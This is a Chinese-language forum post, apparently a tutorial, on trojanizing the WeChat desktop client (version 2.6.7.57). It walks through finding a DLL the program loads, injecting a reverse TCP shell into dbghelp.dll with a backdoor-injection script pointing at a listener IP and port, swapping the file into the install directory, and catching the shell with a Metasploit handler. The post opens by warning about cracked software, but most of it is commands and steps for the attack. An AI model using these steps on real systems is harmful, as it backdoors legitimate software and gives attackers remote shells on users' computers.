|
写在前面
通常情况下,我们会常常到网络中下载一些破解版的软件进行使用。在方便的时候也给我们带来了很多的网络安全隐患。今天我们来看看,攻击者是如何进行利用正常软件进行网络攻击的。
准备
- 微信电脑端(版本2.6.7.57)
- 增强型任务管理器(Process Explorer)微软官方下载地址
运行Process Explorer查看微信运行时所有调用的文件
可以看到微信调用了很多他的配置文件,那么,我们能不能从他的配置文件下手呢?
我们定位到我们微信的安装目录C:\Program Files (x86)\Tencent\WeChat
既然微信调用了.dll的配置文件,我们可不可以将后门放到其配置文件中,运行微信后,微信会调用我们的配置文件。这样我们的后门也就启动了。
OK!既然如此,我们给其配置文件添加后门!这里我们以dbghelp.dll文件为列!这个因为是微信的帮助文件,当然我也试了下其他文件,当我们注入后门时,微信无法打开,估计是核心文件,一旦破坏就不能使用,但是像帮助文档的文件,即使破坏微信又能使用。
利用backdoor添加后门
[pre]
python backdoor.py -f /root/msf/wx/dbghelp.dll -s reverse_shell_tcp_inline -P 5555 -H 192.168.123.231
[/pre]
填坑时间:
kali默认安装了backdoor但是在生成的时候报错,不知道是那个的问题,我们从github下载最新的文件,直接执行上述命令即可。
-P:填写你的端口
-H:填写你的ip地址(可以是内网也可以是外网)
这里我们选择2选项,其他选项我们尝试,大家可以试试!
后门会生成在backdoored文件下
我们替换掉微信中的源文件(最好将源文件备份)
配置msfconsole
分别执行下面命令
[pre]
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LPORT 5555
set lhost 192.168.123.231
exploit
[/pre]
启动微信后,我们成功获得系统shell
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|